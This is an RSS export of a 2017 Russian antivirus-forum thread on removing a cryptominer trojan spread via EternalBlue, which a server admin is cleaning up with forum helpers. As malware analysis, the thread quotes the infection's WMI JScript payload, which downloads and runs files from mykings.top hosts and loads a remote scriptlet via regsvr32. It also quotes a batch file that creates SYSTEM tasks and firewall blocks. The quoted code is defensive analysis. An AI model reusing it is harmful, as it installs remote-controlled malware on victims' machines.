<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Wed, 29 Apr 2026 20:21:26 +0300</pubDate>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99464/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_YovfmkUh" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />файл c2.bat как раз нам интересен<br />=============<br /><br />Вчера подобный файл внесли в базу как угрозу... <img src="http://forum.esetnod32.ru/upload/main/smiles/5/icon_smile.gif" border="0" data-code=":)" data-definition="SD" alt=":)" style="width:16px;height:16px;" title="С улыбкой" class="bx-smile" /> <br />
			<i>13.06.2017 11:53:38, Дмитрий.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99464/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99464/</guid>
			<pubDate>Tue, 13 Jun 2017 11:53:38 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99463/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			скрипт надо выполнить обязательно, потому что он очищает левый обработчик событий WMI.<br /><br />этот обработчик и добавляет вам в систему вредоносные файлы из сети, которые пока гасятся антивирусом.<br /><br /><br />====quote====<br />Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]<br />Имя файла FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]<br />Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске<br /><br />Удовлетворяет критериям<br />WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)]<br /><br />Сохраненная информация на момент создания образа<br />Статус в автозапуске<br /><br />Namespace \\.\root\subscription<br />Consumer_Name fuckyoumm2_consumer<br />Consumer_Class ActiveScriptEventConsumer<br />Consumer_ScriptingEngine Jscript<br />Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i &lt; arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1&lt;toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length&gt;i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");<br />Filter_Name fuckyoumm2_filter<br />Filter_Class __EventFilter<br />Filter_Query select * from __timerevent where timerid="fuckyoumm2_itimer"<br />#MOF_Bind#<br />instance of __FilterToConsumerBinding<br />{<br />Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="fuckyoumm2_consumer"";<br />Filter = "\\\\.\\root\\subscription:__EventFilter.Name="fuckyoumm2_filter"";<br />};<br /><br />#MOF_Event#<br />instance of __EventFilter<br />{<br />Name = "fuckyoumm2_filter";<br />Query = "select * from __timerevent where timerid="fuckyoumm2_itimer"";<br />QueryLanguage = "wql";<br />};<br />=============<br /><br />через этот обработчик выполняется попытка установить в систему майнер криптовалюты. <br />
			<i>13.06.2017 10:21:48, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99463/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99463/</guid>
			<pubDate>Tue, 13 Jun 2017 10:21:48 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99462/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Нет, не выполнил. Т.к. смогу это сделать только ночью, когда все будут отключены от сервера. <br />Файл тоже постараюсь сегодня поймать. &nbsp; <br />
			<i>13.06.2017 10:12:51, Андрей Пахомов.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99462/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99462/</guid>
			<pubDate>Tue, 13 Jun 2017 10:12:51 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99460/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			скрипт в uVS выполнили?<br /><br />файл c2.bat как раз нам интересен, потому что в образ он (список команд бат файла) попадает не полностью. <br />
			<i>13.06.2017 09:47:43, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99460/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99460/</guid>
			<pubDate>Tue, 13 Jun 2017 09:47:43 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99459/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Политики, задания и пр. поудалял. <br />Проверяю сейчас антимэйлваром. <br />Файл архивировать и отправлять пока не буду, <br />Нод успешно его на подлёте сносит.<br />Винду пропатчил, буду наблюдать. <br />Спасибо всем за помощь! &nbsp; <br />
			<i>13.06.2017 09:39:14, Андрей Пахомов.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99459/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99459/</guid>
			<pubDate>Tue, 13 Jun 2017 09:39:14 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99406/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Андрей Пахомов,<br />вам необходимо пропатчить систему, чтобы после ее очистки она опять же не подверглась атаке <br /><br /><br />====quote====<br />Требуется установка обновления KB4012598, если у вас следующие операционные системы:<br /><br /> &nbsp; &nbsp;Windows 8, Windows XP SP3, Windows XP SP2 64-bit, Windows Server 2008 for Itanium-based Systems, Windows Vista, Windows Server 2008, Windows XP Embedded, Windows Server 2003, Windows Server 2003 Datacenter Edition.<br />=============<br /><br /><noindex><a href="https://www.comss.ru/download/page.php?id=4016" target="_blank" rel="nofollow">https://www.comss.ru/download/page.php?id=4016</a></noindex><br /><br />для вашей системы <br /><br />Microsoft Windows Server 2003 R2 x86 (NT v5.2 SP2) build 3790 Service Pack 2 [C:\WINDOWS]<br /><br />патч MS-2017-010 скачать отсюда:<br /><br /><noindex><a href="http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598" target="_blank" rel="nofollow">http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598</a></noindex> <br />
			<i>09.06.2017 19:53:50, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99406/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99406/</guid>
			<pubDate>Fri, 09 Jun 2017 19:53:50 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99405/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Работают люди <img src="http://forum.esetnod32.ru/upload/main/smiles/5/icon_smile.gif" border="0" data-code=":)" data-definition="SD" alt=":)" style="width:16px;height:16px;" title="С улыбкой" class="bx-smile" /> &nbsp;<img src="http://forum.esetnod32.ru/upload/main/smiles/5/icon_wink.gif" border="0" data-code=";)" data-definition="SD" alt=";)" style="width:16px;height:16px;" title="Шутливо" class="bx-smile" /> <br />
			<i>09.06.2017 19:38:09, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99405/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99405/</guid>
			<pubDate>Fri, 09 Jun 2017 19:38:09 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99404/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Это похоже на Adylkuzz, судя по тому что закрывается доступ к указанным портам.<br /><br /><br />====quote====<br /><br />Попав на компьютер жертвы Adylkuzz сканирует компьютер на наличие своих же копий, завершает их, блокирует SMB-коммуникации, определяет публичный IP-адрес жертвы, загружает инструкции и криптомайнер. Похоже, существует несколько серверов управления вирусом, откуда он загружает инструкции и необходимые модули.<br /><br />Интересен ещё и такой факт: попадая на компьютер жертвы, Adylkuzz как бы закрывает дверь изнутри и вирус WannaCry просто не может на него проникнуть. То есть распространение одного вируса, способствовало подавлению эпидемии распространения другого.<br />=============<br /><br /><noindex><a href="https://habrahabr.ru/post/328932/" target="_blank" rel="nofollow">https://habrahabr.ru/post/328932/</a></noindex><br /><br /><br />====quote====<br />On Friday, May 12, attackers spread a massive ransomware attack worldwide using the EternalBlue exploit to rapidly propagate the malware over corporate LANs and wireless networks. EternalBlue, originally exposed on April 14 as part of the Shadow Brokers dump of NSA hacking tools, leverages a vulnerability (MS17-010) in Microsoft Server Message Block (SMB) on TCP port 445 to discover vulnerable computers on a network and laterally spread malicious payloads of the attacker’s choice. This particular attack also appeared to use an NSA backdoor called DoublePulsar to actually install the ransomware known as WannaCry.<br /><br />Over the subsequent weekend, however, we discovered another very large-scale attack using both EternalBlue and DoublePulsar to install the cryptocurrency miner Adylkuzz. Initial statistics suggest that this attack may be larger in scale than WannaCry: because this attack shuts down SMB networking to prevent further infections with other malware (including the WannaCry worm) via that same vulnerability, it may have in fact limited the spread of last week’s WannaCry infection.<br /><br />=============<br /><br />Однако в последующие выходные мы обнаружили еще одну очень крупную атаку с использованием как EternalBlue, так и DoublePulsar для установки майнера криптовалюты Adylkuzz. Первоначальная статистика показывает, что эта атака может быть больше по масштабу, чем WannaCry: поскольку эта атака отключает SMB-сеть, чтобы предотвратить дальнейшие заражения другими вредоносными программами (включая червя WannaCry) с помощью той же уязвимости, возможно, это ограничило распространение на прошлой неделе Инфекция WannaCry.<br /><br /><noindex><a href="https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" target="_blank" rel="nofollow">https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar</a></noindex> <br />
			<i>09.06.2017 19:27:37, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99404/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99404/</guid>
			<pubDate>Fri, 09 Jun 2017 19:27:37 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99403/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Андрей Пахомов<br /><br />Там ещё файлик.<br /><br />C:\WINDOWS\DEBUG\C2.BAT<br /><br />Его нужно удалить. <br />
			<i>09.06.2017 18:51:09, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99403/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99403/</guid>
			<pubDate>Fri, 09 Jun 2017 18:51:09 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99401/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			+<br />проверьте,<br />кем создана эта политика безопасности ipsec,<br />Active IPSec Policy [Local]: SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{66ff4bd3-c14c-41bb-8f5b-2f23f3ccf97d}<br />если не вами, то &nbsp;ее лучше отключить.<br />------------<br />судя по содержимому c2.bat таки политика ipsec создана зловредом.<br />заархивируйте этот файл с паролем infected и вышлите в почту safety@chklst.ru<br />C:\WINDOWS\DEBUG\C2.BAT<br /><br /><br />====quote====<br />ping 127.0.0.1 -n 10<br />net1 user IISUSER$ /del&net1 user IUSR_Servs /del<br />cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*<br />schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" &nbsp;/sc onstart /F<br />schtasks /create /tn "ok" /tr "rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa" /ru "system" &nbsp;/sc onstart /F<br />netsh ipsec static add policy name=win<br />netsh ipsec static add filterlist name=Allowlist<br />netsh ipsec static add filterlist name=denylist<br />netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135<br />netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137<br />netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138<br />netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139<br />netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445<br />netsh ipsec static add filteraction name=Allow action=permit<br />netsh ipsec static add filteraction name=deny action=block<br />netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny<br />netsh ipsec static set policy name=win assign=y <br />ver | find "5.1." &gt; NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL<br />@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe<br />@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe<br />@Wmic Process Where "Name='svchost.ex<br />=============<br /> <br />
			<i>09.06.2017 15:33:46, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99401/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99401/</guid>
			<pubDate>Fri, 09 Jun 2017 15:33:46 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99400/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			если же подобные угрозы фиксируются на других компутерах в локальной сети,<br />то добавляйте образы автозапуска по всем компам, где есть подобные логи в журнале угроз. <br />
			<i>09.06.2017 15:29:14, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99400/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99400/</guid>
			<pubDate>Fri, 09 Jun 2017 15:29:14 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99399/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			выполняем скрипт в uVS:<br />- скопировать содержимое кода в буфер обмена;<br />- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;<br />- закрываем все браузеры перед выполнением скрипта;<br />при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем &quot;да&quot;<br />
====code====
<pre>

;uVS v4.0.5 &#91;http://dsrt.dyndns.org&#93;
;Target OS: NTv5.2
v400c
OFFSGNSAVE
regt 35
;------------------------autoscript---------------------------

delref WMI_ACTIVESCRIPTEVENTCONSUMER&#92;FUCKYOUMM2_CONSUMER.&#91;FUCKYOUMM2_FILTER&#93;
apply

; Java(TM) 6 Update 22
exec MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216022FF} /quiet
deltmp
delref %Sys32%&#92;BLANK.HTM
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}&#92;&#91;CLSID&#93;
delref {166B1BCA-3F9C-11CF-8075-444553540000}&#92;&#91;CLSID&#93;
delref {233C1507-6A77-46A4-9443-F871F945D258}&#92;&#91;CLSID&#93;
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}&#92;&#91;CLSID&#93;
delref {761497BB-D6F0-462C-B6EB-D4DAF1D92D43}&#92;&#91;CLSID&#93;
delref {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBC}&#92;&#91;CLSID&#93;
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}&#92;&#91;CLSID&#93;
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}&#92;&#91;CLSID&#93;
delref {764BF0E1-F219-11CE-972D-00AA00A14F56}&#92;&#91;CLSID&#93;
delref {853FE2B1-B769-11D0-9C4E-00C04FB6C6FA}&#92;&#91;CLSID&#93;
delref {FAC3CBF6-8697-43D0-BAB9-DCD1FCE19D75}&#92;&#91;CLSID&#93;
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;TEMP&#92;1&#92;V8_1AF_53.TMP
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.135&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.99&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;TEMP&#92;1&#92;V8_1A_E.TMP
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.57&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.25.5&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.23.9&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.27.5&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.26.9&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.69&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.149&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.145&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.2.183.39&#92;GOOPDATE.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.115&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.79&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;TEMP&#92;1&#92;V8_25B_E.TMP
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.65&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.30.3&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.28.1&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.123&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.24.7&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;TEMP&#92;1&#92;V8_5_66.TMP
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.153&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.33.3&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.28.13&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.29.5&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.32.7&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.25.11&#92;PSUSER.DLL
